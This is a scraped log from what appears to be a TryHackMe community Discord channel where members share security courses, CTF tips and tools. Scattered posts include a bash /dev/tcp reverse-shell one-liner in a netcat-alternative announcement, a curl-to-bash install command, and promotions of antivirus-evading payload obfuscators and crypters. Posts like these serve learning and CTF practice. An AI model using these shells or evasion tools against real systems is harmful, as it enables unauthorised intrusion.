Technically, couldn't you now use this technique to scan tons of websites for exposed content to the CloudFlare CDN?
269
Just bypass cloud flare with cloud flare
thats the thing i always wondered what if we just used workers which are already inside cloudflare network
like cloudflare wouldnt rate limit their own ips
I believe cloudflare made the move/is making the move to "untrust" some of their ip ranges for this reason in addition to things like the 1.1.1.1 WARP (specialized VPN)
theoretically they cant atleast not worker
because if they do then all projects hosted behind that proxy address will get rate limited too
for no reason
New #PEbear (0.5.4) is out! https://t.co/c5HU3VSISh
- among the new features: .NET header, and a preview of images in resources
Hi, found this great and super detailed resource :
Registration started for the TraceLabs OSINT CTF, competed in the last one and had a ton of fun
https://twitter.com/TraceLabs/status/1396491565699321863
Thank you for sharing this awesome content
Gave +1 Rep to @tranquil shuttle
np 
I just registered for that one yesterday! It'll be my first OSINT CTF, looking forward to it!
how often Trace Labs do these per year?
nice! idk if they still accept everyone, but the Trace Labs slack also has a long-term operations channel where they run real-life cases in a similar format to the CTF, i did a few and it's really good practice
im not sure, this next one coming up would be their 2nd this year, its not that often though
I hope that I can join the next one.
Small tips :
During a CTF ||more at easy level ||when you have to access a webserver and upload a simple webshell, most of the time the " cat " command will be disabled
to make your enumeration a little bit harder, ||I believe it's the case in the Rick & Morty room|| so don't forget you can still use the reversed one " tac " it'll have the same effect as the normal one and you'll still be able to correctly enumerate the filesystem
Wait what?
The « tac » command has the same effect as the « cat » one
But it will print files in reverse, you can test it in your own terminal
Yup that’s right, but when you have only one line it will print it out the same as cat, useful when you can’t use « cat » because disabled
yea right
It’s not something very useful but still helps sometime
Thanks 
Nice. I've been looking for one of these.
new blog post on how to write a slow and bad port scanner in Go
https://droogy.tech/post/slowgo/
Many CTF Players Face Problems Connecting To Openvpn Servers Simply Because They Are Behind A Firewall That Blocks Outbound And Inbound Traffic, I Wrote This With An Example On How To Access TryHackMe
OpenVPN Server.
Nice work!
Just as a tip, you can streamline that a lot
Have a look into sshuttle (do Wreath if you haven't already) -- that will completely cut out the need for proxychains
You can also do it with iptables rules, effectively turning your EC2 instance into a router; but, if you do that, please restrict the IPs that can connect to it
Furthermore, you could potentially also set up your own OpenVPN server and effectively tunnel through two VPNs, which would also work, in theory
One of the first two options will be faster though 🙂
For the sake of simplicity, I recommend sshuttle because it will already work with the infrastructure you have running there, no new configurations necessary
Nooooo, I was too late rip
cool little cheat-sheet project
https://github.com/chubin/cheat.sh
cool :)
idk if im on the correct channel but is the CISCO Self Study Guide by Steve McQuerry a good resource for networking?
Nice, that is pretty sweet!
seems like a nice book, but if you are just starting check out the free resources
like tryhackme, network chuck has some good intro videos
Wanted to ask if there is a place/website that offers mentorship for a Junior Level Pen-tester
“Battleship” maybe?
battleship what?
also The Cyber Mentor offers paid mentorship
Hi everyone,
I remember this group have the channel for shared book and pdf . Currently, it's moved , right ?
you mean #bookclub ?
Not sure, last time to access this server maybe 2019. In #bookclub , I not seen someone share files.
Are you talking about pirated books and PDFs?
Yes
@strange ice We don't do that here, and we never have. Piracy is illegal, and we do not tolerate it here. Is that clear?
Oh !sorry, I might remember the wrong group.
https://github.com/0xd1912e/KillAll-SSH/blob/main/ssh.sh
a bash script used to kill all sessions in your ssh, i made this for myself to play koth and make it easier for myself but you guys are of course to use it freely, @fluid galleon made the same thing but wouldn't share me the code so i just had to make it myself and like the nice dood i am, all you guys can use it :D .
a script you can use to kill all sessions in your ssh. I made this to use it for KOTH. on, https://tryhackme.com/games/koth - 0xd1912e/KillAll-SSH
For those who dont know https://education.github.com/pack
♡ Thanks for your support ♡
Ready to start planning out your career in cybersecurity? Grab my ebook here get started:
https://thedigitalempress.com/store/p/the-ultimate-guide-for-getting-into-cybersecurity-for-beginners-ebook
♡ Blog Post with all of the tips and tricks for reference (BOOKMARK IT)
https://thedigitalempress.com/blog/day-28-10...
I can not claim domain name using this service. After giving all the info, they asks for money 😕

Anyone know where I can get a video that actually explains what all this scripting means
I meant a tryhackme video that explains task1 in Scripting room
what's the issue though, this example is pretty straight-forward
so basically, the first lines of code opens a file called b64.txt and reads it the second lines use b64decode to decode the message in base64 i guess and then prints out the decoded message
its python code btw
That's the issue, is that this writeup is pretty straight forward lol.
Like what does the _ mean ?
and the f:
for _ in range(50):
print(_)```
this will print all the numbers between 0-50
_ stores the value
u can also change it to for i in range
Okay, seems like i need to watch some basic bash scripting videos on YouTube that actually explains what all this means. The write doesn't explain just gives you the code
yeah, I've never used for _ in range, always for i in range
Yeah this is what i'm saying
I don't know what the f: meant either
but either ways the code will work
yeah, i use "i" then "j" etc. lol
where?
format
i think he means f.read
yep
a = 'Hi'
print(f"{}",a)```
f.read okkk
@shut ferry
"f" is a bad variable name, it is the object that is used to read the file
Coding is > then hacking but then Hacking is also > then coding 😦
f means format
so in the first line with open('b64.txt') as f it opens the file and stores it in f then that is being used in msg = f.read()to read the file and store it in "msg"
life is hard
I semi understood this part
with open('b64.txt') as f: means that he wants to name it as f instead of b64.txt
means he can say f.read() instead of b64.read
super easy!
I mean you don't memorize it per se, it's just the syntax of the language, python is the easiest really
oh lets switch to #programming
if you want some good scripting practice, cactuscon had some solid beginner challenges and they also teach you a fair bit in each module
https://samsclass.info/124/VP2020.htm
Before we leave, does anyone recommend any good beginner bash course vids? Codecademy and Freecodecamp are cool but i want to watch first as it will help me better understand visually
then for _ in range(50) enumerates the code msg = base64.b64encode(msg) 50 times, and base64 and b64decode are Methods that are being imported from the library base64 in line 1 (import base64) then at the end it just prints the decoded message
see i need to learn where i can get the base64encode syntax etc..
i guess i need to study the modules
and _
is just a variable that we dont need to use anymore so _ is being used here, if you would want to use that for something you could use any letter etc.
and libraries
you import it in the beginning of the file
import base64
so you want to learn bash and not python?
Just bash
import base64 imports the library and allows you to use any methods in that library
I want to ultimately become a bug bounty hunter
i want to use bash to my full power and advantage
make tasks more easier
specifically for bug bounty use
hopefully someone can chime in with videos, I don't learn that way
I'm a hybrid
@shut ferry https://youtu.be/rfscVS0vtbw?t=11561 here are some code examples for Reading and writing files
Oooooooo o.0
tho ultimately I'd say it's best to start from the beginning and learn the fundamentals
@shut ferry i would suggest learning the basics of Python (learining how to code simple functions and algorithms) and then move on to javascript and try to implement it into some website with Hmtl
I'm gong to stick with bash.
learn bash as much I can then switch over to python if need be
I think Javascript would be my second.
check my github im trying to do that for you
for everyone
@shut ferry check dm regarding it^
https://h4r1337.gitbook.io/ctf/thm/unstable-twin
My first writeup... Feel free to say any suggestions and errors.
good1 @shy glacier
Thanks bro
luckily came across this today! Tag all those who love clouds xD
https://pages.cloudthat.com/az-104-free-training-india/
In this post, I’m going to list and explain the most commonly used terminology in Active Directory and related technologies. If you are new to Active Directory, this will be a great resource for you to get familiar with Active Directory basics and fundamental concepts. I’ve grouped terms together in different sections to make it…
Make your binexp life easier
https://gist.github.com/NinjaJc01/e309be8a817abc56477b4e1196eb16f2
Looking at a bunch of pwdump output (eg you just dumped a domain controller), and you want to immediately get that into hashcat/john? Try this. Parses pwdump format output (like meterpreter's hashdump) and provides username:ntlm format which john or hashcat can easily use.
Convert PWDump format output to something John the Ripper can more easily use, NTLM hashes only. Hashcat can also use this, with --username. - pwdump2.py
did you do this in a rush or forget to use with() 
also can do .read().strip() instead of the "".join() I believe
It was written in about 3 minutes because I had a like... whole page of pwdump format hashes from a domain controller
It was originally just using a triple quoted string for the hashdump
That is awesome ! @shut ferry
ayy thanks roki 😁
any1 have any resources for the basics basics of buffer overflow
https://tryhackme.com/room/sudovulnsbof
doing this right now but i definitely want more
Also watch: https://www.youtube.com/watch?v=1X2JGF_9JGM
thank you!
https://aksheet10.medium.com/powerview-common-commands-60f9a9ad6a80
just my cheatsheet
please tell me if you want to change sometime or something is wrong
Academy (http://academy.tcm-sec.com) - 50OFFSITEWIDE
Udemy - 50OFFSITEWIDE-UDEMY3
TCM Coupons
50% off
Here's a utility I made as part of a kata for working with bytes in python, some particularly evil challenge makers might be able to make use of it to split flags up or obfuscate other things
https://github.com/Droogy/Splitr
Nice! Just a heads up, using with() automatically closes the file :))
ah thank you, good to know, i remember reading somewhere that using close() is best practice - might've been a python2 thing
Gave +1 Rep to @sonic abyss
Yeah, if you use it without the with() statement, it is best to use close() as you said
https://0xevan.medium.com/metasploit-write-up-bfdc65d397b0
first ever blog
good1 @shut ferry
Gave +1 Rep to @light crystal
GJ 
thankssss swann
+rep
Gave +1 Rep to @stone linden
Impressive
And actually the first article that actually made me understand what Metasploit is... :/ Really helped understand what the I'm doing in the room xD
Do not forget to get your free copy of the INE IT Training Courses : Starter Pass, they give amazing resources for free
INE also offering free eJPT certification exam with their subscription plan
Maybe you can do an option for recursively splitting?
so like split until the length is 50mb
It's already handy, but that would make it even better
so you mean an option so it splits into more than 2 files? I was thinking about that, just too lazy to implement haha - PRs are always welcome I will most likely merge anything within reason 😄
lol gonna use this for security awareness training
http://www.shadyurl.com/create.php
ahh okay.. Just a question, but are you opening the files in byte mode for a reason? because I'm pretty sure you can't do string manipulation now
yeah I am, I tried a few different ways of opening the files and writing bytes/strings/ints to them and found what I ended up with just works - im sure there's better ways of doing it
you don’t understand how much this means to me dude, thank you so much.
Gave +1 Rep to @oak quiver
this is the way
does some one has a paper tthat explain how to get revshell through pivoting?
with out metasploit
Not a paper, but the #wreath-network room has some good info on pivoting
dirsearch, just found it and it's so much easier than gobuster
extremely fast as you can see :)
the latest kali also has feroxbuster, which can do recursive scans I think
dirsearch also can use recursive "-r"
That's super useful for me right about now, thank you so much
Gave +1 Rep to @crimson thunder
hey, I'm glad 😄
https://guesstheflag.zh3r0.com/
ctf going on in 12 hours, open to everyone if you want to join, prizes listed above.
Launch your journey to a Cisco certification in security. Enter our Cybersecurity Giveaway now for your chance to win a training and exam voucher bundle towards Cisco Certified CyberOps Associate, CyberOps Professional or CCNP Security.
Complete this form to enter the giveaway.
Winners will have their choice of one of the following options:
C...
winners can choose between cyberops associate, cyberops professional, or ccnp security (all options are course+exam voucher)
guys any collection for most useful android tools and docs for penetration testing (for both of remote and local attacks)
job hunting stream with banjo - he's currently helping me look for a SOC job 😄
https://www.twitch.tv/banjocrashland
inherently relative https://en.wikipedia.org/wiki/High-level_programming_language#Relative_meaning
In computer science, a high-level programming language is a programming language with strong abstraction from the details of the computer. In contrast to low-level programming languages, it may use natural language elements, be easier to use, or may automate (or even hide entirely) significant areas of computing systems (e.g. memory management),...
saving this for myself other people might use it too
If anyone is in need of cyber/infosec books have a look at this tweet, a bunch of peoples have replied with their top books
https://twitter.com/cybersecurityda/status/1400812992506302465?s=21
What are your favorite #CyberSecurity books? 🤔
I’m trying to make a list here! 📝
Any suggestions? 🚀
133
620
@dull grove PUBG gaming montages are not really relevant here.
anyone here passed linux + and can recommend any good resources that got them through it?
Python Obfuscator - Creates a FUD One Liner
The example below is with PentestMonkey's PHP Shell, this also bypasses Windows Defender with Python Meterpreter.
Repo: https://t.co/eTWmznbW3S
Creator: @SpicysoulsV
#CyberSecurity #CTF #BypassAV #Python #bugbountytips
@grand anchor Please use #thm-community-media for posting writeups
id rec using markdown format for writing...but good overall
New Netcat Alternative Made In Rust
As you guys may know netcat is a thing... I pretty old thing.
So I decided to make a newer more modern netcat alternative in rust (rustcat)
Why should you use rustcat instead of netcat:
- It is more modern 💻
- Made in rust ⚙️
- Has colors to make it fancier 🎨
- Daily Maintained 🧑🏭
How to get a rce with it?
- Start up a listner on specified port ex. (rc -lp 55600) 📡
- Open a reverse shell on a target machine with for example(/bin/bash -c 'bash -i >& /dev/tcp/your-ip-running-the-listener/55600 0>&1') 🛰️
- Boom you got yourself a nice rce

More features will be added in the future.
Also remember to give the repo a star⭐ and create a issue if you have an idea or find a bug
Thank you 🙂
Updated June 5th, 2021: I have made some more changes to this post based on (among others) techniques discussed in ZeroPointSecurity’s ‘Red Team Ops’ course (for the CRTO certification). I’ve re-written and improved many sections. New sections have been added on DPAPI and GPO abuse. Notable changes have been made to the the sections on LAPS, App...
@prisma bison
Malicious links when I checked and possibly pirated content unsure tho
Malicious?
They all lead to Amazon, I can’t check if they’re redirect because I’m on mobile
@hardy void Can you avoid posting referral links please, just link the book itself
Only book name @prisma bison ok
Not malicious they are Amazon Link from Amazon
Alright when I check it came up as malicious but oh well
I deleted because i need permission from mod can i post my info book with Amazon Link that why deleted they are affiliated link
You can use wheregoes website to check the redirect without actually visiting website
cool! thanks
gotta install and try
Gave +1 Rep to @quartz tiger
:)) Also keep in mind its in a very early stage
And more features will be added
hmm, is this my machine?
Is your system 64 bit or 32 bit?
Hm
install from source works :)
bash <(curl -s https://raw.githubusercontent.com/robiot/rustcat/main/latestinstall.sh)
That command?
yep
Cool :))
although
i would not rely on snap to install rustup
i did sudo apt install rustc cargo libasound2-dev libssl-dev pkg-config
maybe not all of them needed but 🤷
Oh yeah, the latestinstall need some fixes, I just made it real quick for easier build and install
Well as long as it works its fine 🙂
And if you want to improve the file, you can always feel free to create a fork and edit and create a pull request :))
Sure
Thanks 👍
Gave +1 Rep to @light crystal
need all and everything forensics please i have a week before this ctf and barely know anything about it
can't think of a better intro than this - there's a lot of different parts to this case (network forensics, disk analysis, memory analysis, etc.,) so I would just approach each part separately . This will take you a few days to go through for sure
https://dfirmadness.com/the-stolen-szechuan-sauce/
I also personally have a done a bunch of exercises from here which focuses on network forensics
https://www.malware-traffic-analysis.net/training-exercises.html
I am currently trying out the Utopia Ecosystem by the 1984 Group. So far it is just a massive freeze fest
overall pretty good from what I have been able to work with
Utopia P2P Ecosystem
Thanks for sharing seems super cool
Gave +1 Rep to @glacial gazelle
🙄
https://beej.us/guide/ -> this guy was a great fun to read back in the day (his guide to network programming was awesome, and the one on Unix IPC was a lot better than my uni teacher's notes as well). I see he has new ones as well. If you enjoy some humor with your content, you might like this as well. Totally free
(gotta cut down on "as well")
I will definitely bookmark it 
The first of ESET's tri-annual threat report
https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf
https://gist.github.com/muff-in/ff678b1fda17e6188aa0462a99626121 @remote wind @white pivot
A curated list of Assembly Language / Reversing / Malware Analysis -resources - resources.md
Saw that in morning lol, thanks
Gave +1 Rep to @gritty barn
Gracias amigo!
credit ->@cerulean viper
so the lessons, at least in the beginner section, recommend "nmap -A -p-" for port scanning, which is... a lot. Anyone got resources for good nmap methodology? I've wound up just adding -T5... which obviously I know shouldn't be done outside of practice lol
Don't do -A
scan all ports if you need to (some rooms tell you what port range to scan), then only do -A on those ports
or not -A at all. Maybe you only need -sV or something
If time is something you want to save, then I would recommend using rustscan.
It searches for open ports only at first, and when scan is complete it will then scan only the open ports with nmap. it saves a lot of time 🙂
Thank you 🙂
Gave +1 Rep to @frigid perch
Does anyone have suggestions for a solid technical writing course/resource? I really need to up my reporting game
hopefully these will come in handy:
https://twitter.com/blueteamblog/status/1351654657521819657
https://pivotproject.org/challenges/digital-forensics-challenge
https://digital-forensics.sans.org/community/challenges
https://web.archive.org/web/20180730224725/http://forensicscontest.com/2010/05/21/puzzle-6-anns-aurora
https://web.archive.org/web/20180816194924/http://forensicscontest.com/2010/07/08/puzzle-6-answers
https://cyberdefenders.org/
https://cyberlaure.wordpress.com/
https://www.incidentresponse.com/playbooks/
https://www.appliedincidentresponse.com/resources/
https://letsdefend.io/
https://blueteamlabs.online/
https://www.sans.org/reading-room/whitepapers/incident/paper/37920 this one is great too
this seems to be useful. I read about it through another beginner in cyber security on reddit and have decided to try it out.
Obsidian is great, it takes a little leg work to get it set up nicely, but can be incredibly versatile if you utilise all it's features
I believe Ippsec has a quick walkthrough at the start of one of his videos, let me try find that
Are you talking about this one ?
00:00 - Intro
01:08 - Installing Obsidian which lets us take notes in Markdown format
03:10 - Running nmap to see FTP over SSL and it has certificates
05:20 - Using openssl to grab the SSL Certificate from FTP
06:50 - Going over the web page extracting emails, people, and user input locations
08:20 - Installing flameshot, which helps us take bet...
Thank you!
Gave +1 Rep to @spare finch
I am using it on windows and I am comparing it to notion side by side
holy shit thank you
Gave +1 Rep to @noble tangle
You’re welcome 
it's gone bro
pretty cool new exploit
https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
polkit is a system service installed by default on many Linux distributions. It’s used by systemd, so any Linux distribution that uses systemd also uses polkit. As a member of GitHub Security Lab, my job is to help improve the security of open source software by finding and reporting vulnerabilities. A few weeks ago, I found a privilege escalati...
MSFVenom Payload Crypter - Bypasses Windows Defender
Repo: https://t.co/9MqC2NNr8S
Creator: @q8fawazo
#CyberSecurity #cybersecuritytips #infosec #bugbounty #bugbountytips #AVEvasion #AVBypass #tryhackme
Microsoft's API to query security updates
https://api.msrc.microsoft.com/cvrf/v2.0/swagger/index
GitHub has disclosed the details of an easy-to-exploit Linux vulnerability that can be used to escalate privileges to root.
Rumour is, there's a room on that coming
hi! Does anybody recommend resources to learn Windows security topics in a more structured way? I suppose out of experience I've been ok with the *nix world, but have been having a harder time wrapping my head around the topics in the Windows rooms I've tried so far (active directory, kerberos, even just basic privesc on a windows machine)
I'm about to start a big google search on the topic, but happy to look at any recommendations 🙂
Complete walkthrough of mustacchio room
https://youtu.be/RBLrM4Nm4WE
@next marlin #thm-community-media
is there any body know how i can download and install obsidian in debian
@odd quest dude channel read-only
You download the appimage and then you can start it ( you probably need to chmod +x it)
You have 3 options right there on the Downloads page - IIRC Debian has packages that support any of the 3 methods.
@devout coral I have it installed on Kali, but if you do not have the packages needed just google for them on Debian and install one by one. that is what I did
you can use snapd i didnt
Yay! Passed the 2k with the help of some awesome folks (you know who you are! 💖).
As promised it's time to celebrate, so I will be giving away a 1mo HTB VIP+ subscription (courtesy of the 💯 folks at @hackthebox_yow), AND a 1mo TryHackMe voucher! Like this tweet to participate! https://t.co/39HWwR9zCI
110
Meowware 
Jabba 
Nice software to cusotmize your windows more officially by Microsoft
do you guys know any good hands on guides for elastic?
Elastic search?
yup, sorry
@arctic mist we’ve been compromised!

thinking about going to this and might be able to get work to chip in 😄
https://blueteamcon.com/
work paying for stuff is always good 🙂
BlizzardWrap - CLI tool for encoding and decoding.
Supports:
URL, MorseCode, Atbash, Vigenere Ciphere, PhoneCode, WigWag, ASCII,HTMLEntities, A1Z26, Binary, Hexadecimal, Hexcode, ROT, Base64, Base32, Base16, Base85, Binary2Hex, Hex2Binary encoding & decoding
https://github.com/prodigiousMind/blizzardwrap
one of my goals is to learn how to understand firewall logs. I ask our admin where can I start for that goal. He said I should learn the core general knowledge of routing/switching and firewall so that I can understand the terms.
any resources for this?
any good networking book, computer networking: top down approach has been recommended before https://www.amazon.com/Computer-Networking-Top-Down-Approach-7th/dp/0133594149/
Computer Networking: A Top-Down Approach [Kurose, James, Ross, Keith] on Amazon.com. FREE shipping on qualifying offers. Computer Networking: A Top-Down Approach
CCNA
with the CCNA approach, downloading packettracer and doing the CISCO online class for it will help start you down the path: https://www.netacad.com/courses/packet-tracer
nice project that makes managing all the Malware/RE tools ezpz
https://github.com/mentebinaria/retoolkit
That project is BEAUTIFUL
no more having to fiddle around in the registry and making custom context menus :p
that's it!
Complete walkthrough of c4ptur3-th3-fl4g room:
https://youtu.be/mdpnBG6TRW8
@next marlin Again, #thm-community-media for writeups
you should verify your profile first.
Your level on TryHackMe can be copied across as a role on the discord server. To do so, you will need to perform the following steps:
@calm ermine
-ban @nova narwhal Steam phishing link.
🔨 Banned Alex Sander S Rocha#1738 indefinitely
+rep @fallow tiger
Gave +1 Rep to @fallow tiger
he wrote in multiple channels. You might need to check them
These are for the older version of CHFI (v9). The later version goes heavier into cloud and memory forensics from what I hear, but these are still helpful notes. And learning a little about the various topics listed in these can help anyone in their cyber career.
P.S. - Keep an eye out early next week for an announcement from me.
pretty in depth scanning technique guide
https://github.com/adulau/active-scanning-techniques
Underrepresented in the #InfoSec industry, and struggling with barriers-to-entry, like the expense of training? Then this is for you...
I have 10 PWK Vouchers to give to worthy candidates... find out more here: https://t.co/s4WlAOnoQz
#PayItForward #HackForGood #OSCP
vouchers will be awarded to South Africans.
What happened?
good resource for report-writing skills
https://developers.google.com/tech-writing/one
Thanks @fast wraith
Gave +1 Rep to @fast wraith
Thanks Brainy
Gave +1 Rep to @light crystal
credit vertey!
good deal on a good printer, usually retails ~$250
https://www.amazon.com/Creality-Certified-Removable-Mainboard-220x220x250MM/dp/B08QZHS6TK?dchild=1&keywords=ender+3+pro&psr=PDAY&qid=1624311890&s=prime-day&sr=1-1&linkCode=sl1&tag=ctrlpew-20&linkId=00eb17b3ae269d73562112d59ea0d797&language=en_US&ref_=as_li_ss_tl
Creality Ender 3 Pro 3D Printer with UL Certified Power Supply Removable Build Surface Plate Resume Printing Function Metal Frame FDM DIY 3D Printers 32bits Mainboard 220x220x250MM: Amazon.com: Industrial & Scientific
A talk on naval cyber security in the real world. https://www.plymouth.ac.uk/research/plymouth-research-festival/2021-cyber-ship-lab
Any recommendations on resources to learn burp?
(These are the people who made burp
@echo estuary has a course on udemy. I have found it useful. You can try
thank you!
windows shellcode generator
https://github.com/netspooky/kimagure
Education should be a right, not a privilege. We shouldn't price those out who cannot afford it. Below you will find coupons for our Practical Ethical Hacking course at prices of your choosing:
PAY5
PAY10
PAY15
PAY20
PAY25
PAYITFORWARD (free)
https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course
thanks to TCM again!
Heyo! Cool AD resource: https://zer1t0.gitlab.io/posts/attacking_ad/
Get it
By The Cyber Mentor
It's an amazing course
Education should be a right, not a privilege. We shouldn't price those out who cannot afford it. Below you will find coupons for our Practical Ethical Hacking course at prices of your choosing:
PAY5
PAY10
PAY15
PAY20
PAY25
PAYITFORWARD (free)
https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course
By The Cyber Mentor
@upper cloud lol
i had already posted it 2 msgs above lul
@hollow phoenix
;)
Oooo
